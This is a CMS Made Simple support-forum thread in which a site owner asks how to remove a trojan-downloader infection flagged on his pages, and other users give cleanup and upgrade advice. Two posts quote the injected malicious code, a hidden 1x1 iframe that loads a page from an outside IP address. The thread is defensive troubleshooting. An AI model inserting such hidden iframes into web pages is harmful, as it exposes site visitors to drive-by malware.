Infection: JS/Psyme.CA

[Torgu]

Hi,
I have problem with homepage I made.
I am using CMSMS 1.3.1 and homepage is situated in a server provided by hosting company. Server is using Apache 2.x and MySQL version is 5.x.

Everything worked fine, but now there is a security issue. If anybody visiting this page anty-virus software ( in my case F-secure) will discover Trojan downloader in homepage and displays warning message "Malicious code found in file C:\...\Temporary Internet Files\Content.IE5\QNC716NY\wp-stats[1].html.
Infection: JS/Psyme.CA".

I upgraded CMSMS version 1.3.1 to 1.4.0, but it does not seem to help.

Any sugestions how to get ride of virus and what are the measures must be taken, so it would not happen again?
I followed all the security instructions, what were mentioned in installation quide.

Thank you,
Kristian

PS I am not a professional IT specialist and knowledge in this field is limited.
 

[Dr.CSS]

You have been hacked, 1.3.1 is not supposed to be vulnerable so you may have been hit from using an earlier ver. then upgraded w/o knowing you had problem or your host has vulnerability, you need to backup files you added like in uploads, modules, etc. and config.php not admin or tmp etc....

Then wipe all folders/files from site then FTP fresh set of 1.4.0 folders/files and your backups, modules, etc. and config.php include the install folder then go to site.com/install/upgrade.php...

Or you could just look at the index.php to see if it looks diff. from the one in your folder of 1.4.0 on your comp...

[Torgu]

Thank you Mark,

Upgrade to 1.4.1 helped. Seems I did not do it correctly first time.
However, I still do not now where the vulnerabilty was/is, because the first CMSMS I have installed was 1.3.1 and I have not been using older versions of CMSMS than 1.3.1? I am trying to get some information from hosting company about possible security issue in their system.

Kristian 

[Dr.CSS]

Are you still hacked, having problems?...

[rtkd]

hi,

wp-stats.html?
that's a file belonging to wordpress not cmsms!

u r prolly vulnarable to the old iframe injection exploit in wp-stats plugin.
it has been solved in 2.2.3

just look through ur posts for something like

Code: Select all

<__iframe src=http://xx.xxx.xx.xx/iframe/wp-stats.php width=1 height=1 frameborder=0></__iframe>

and delete it.

or do a google search, there r thousands of other ppl with the same problem.

greetz, rootkid

[Torgu]

Hi,
Problem is back.

I found malicious code " <__iframe src=http://61.155.8.157..." in some php files, what were situated in catalogue .../htdocs/tmp/templates_c/

But, most likely this kind of code is also written to many different files somewhere in htdocs subdirectories.

As rootkid mentioned, this is widely known problem with WordPress software, used for blogging. The funny thing is, that I am not a blogger and I do not use this software. Also I haven´t installed any additional puggins to CMSMS.
From Google I found out, that CMS-s like Mambo and Joomla also have had this kind of problem.

I think I can get rid of the virus (delete old files and make new install, for example, if the infection is not in the Mysql database), but there is no point of doing it, if the question, "How the hackers get in?" remains unanswered.

Kristian 

[alby]

but there is no point of doing it, if the question, "How the hackers get in?" remains unanswered.

If you stay on shared server, you can be hacked from an other site on same server .....

Alby